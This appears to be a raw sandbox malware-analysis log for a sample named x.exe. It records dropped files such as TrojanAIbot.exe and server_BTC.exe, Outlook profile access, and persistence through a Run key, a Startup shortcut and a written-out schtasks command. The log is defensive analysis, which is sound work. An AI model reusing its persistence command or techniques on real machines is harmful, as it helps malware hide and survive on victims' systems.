                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: winmm.dll
                      Source: C:\Users\user\Desktop\x.exe | Section loaded: wininet.dll
                      Source: C:\Users\user\Desktop\x.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                      Source: TrojanAIbot.exe.lnk.10.dr | LNK file: ..\..\..\..\..\ACCApi\TrojanAIbot.exe
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                      Source: x.exe | Static file information: File size 1081856 > 1048576
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: lxsyrsiW.pif, 00000008.00000003.2187757870.0000000028410000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020BA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2111562829.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2110299253.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020C47000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.2166700706.00000000058F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbH source: x.exe, 00000000.00000003.2148801262.000000007E280000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000002.2255493713.000000007EC47000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2149675181.000000007F100000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2148801262.000000007E307000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2170510348.0000000021E90000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000003.2111145235.0000000002B70000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020BA3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2111562829.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2110299253.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000000.00000003.2170510348.0000000021EBF000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2200179187.0000000002DA9000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000000.00000002.2233962338.0000000020C47000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: esentutl.exe, 00000005.00000003.2166700706.00000000058F0000.00000004.00001000.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: Yara match | File source: 0.2.x.exe.2ec0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000003.2111562829.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: lxsyrsiW.pif.0.dr | Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02ED894C
                      Source: Wisrysxl.PIF.6.dr | Static PE information: real checksum: 0x0 should be: 0x10a70e
                      Source: x.exe | Static PE information: real checksum: 0x0 should be: 0x10a70e
                      Source: neworigin.exe.8.dr | Static PE information: real checksum: 0x0 should be: 0x480db
                      Source: armsvc.exe.8.dr | Static PE information: real checksum: 0x32318 should be: 0x149d34
                      Source: lxsyrsiW.pif.0.dr | Static PE information: real checksum: 0x0 should be: 0x1768a
                      Source: TrojanAIbot.exe.10.dr | Static PE information: real checksum: 0x0 should be: 0x42478
                      Source: server_BTC.exe.8.dr | Static PE information: real checksum: 0x0 should be: 0x42478
                      Source: alpha.pif.5.dr | Static PE information: section name: .didat
                      Source: armsvc.exe.8.dr | Static PE information: section name: .didat
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EED2FC push 02EED367h; ret 0_2_02EED35F
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EC63AE push 02EC640Bh; ret 0_2_02EC6403
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EC63B0 push 02EC640Bh; ret 0_2_02EC6403
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EEC378 push 02EEC56Eh; ret 0_2_02EEC566
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ECC349 push 8B02ECC1h; ret 0_2_02ECC34E
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EC332C push eax; ret 0_2_02EC3368
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EED0AC push 02EED125h; ret 0_2_02EED11D
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EEE0A9 push edx; retf 0_2_02EEE0AA
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED306C push 02ED30B9h; ret 0_2_02ED30B1
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED306B push 02ED30B9h; ret 0_2_02ED30B1
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EED1F8 push 02EED288h; ret 0_2_02EED280
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EED144 push 02EED1ECh; ret 0_2_02EED1E4
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EDF108 push ecx; mov dword ptr [esp], edx 0_2_02EDF10D
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EC6784 push 02EC67C6h; ret 0_2_02EC67BE
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EC6782 push 02EC67C6h; ret 0_2_02EC67BE
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ECD5A0 push 02ECD5CCh; ret 0_2_02ECD5C4
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ECC56C push ecx; mov dword ptr [esp], edx 0_2_02ECC571
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EEC570 push 02EEC56Eh; ret 0_2_02EEC566
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EDAAE0 push 02EDAB18h; ret 0_2_02EDAB10
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED8AD8 push 02ED8B10h; ret 0_2_02ED8B08
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ECCA4F push 02ECCD72h; ret 0_2_02ECCD6A
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ECCBEC push 02ECCD72h; ret 0_2_02ECCD6A
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED886C push 02ED88AEh; ret 0_2_02ED88A6
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02F34850 push eax; ret 0_2_02F34920
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED6948 push 02ED69F3h; ret 0_2_02ED69EB
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED6946 push 02ED69F3h; ret 0_2_02ED69EB
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED790C push 02ED7989h; ret 0_2_02ED7981
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED5E7C push ecx; mov dword ptr [esp], edx 0_2_02ED5E7E
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02ED2F60 push 02ED2FD6h; ret 0_2_02ED2FCE
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 8_1_1000B180 push 1000B0CAh; ret 8_1_1000B061
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 8_1_1000B180 push 1000B30Dh; ret 8_1_1000B1E6

                      Persistence and Installation Behavior

                      Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\Libraries\Wisrysxl.PIF
                      Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
                      Source: C:\Users\user\Desktop\x.exe | File created: C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | File created: C:\Users\user\AppData\Local\Temp\neworigin.exe
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | File created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | File created: C:\Users\user\AppData\Local\Temp\server_BTC.exe

                      Boot Survival

                      Source: C:\Windows\SysWOW64\esentutl.exe | File created: C:\Users\Public\alpha.pif
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:00 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Code function: 8_1_1002CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 8_1_1002CBD0
                      Source: C:\Users\user\Desktop\x.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wisrysxl

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\x.exe | Code function: 0_2_02EDAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_02EDAB1C
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\Desktop\x.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pif | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
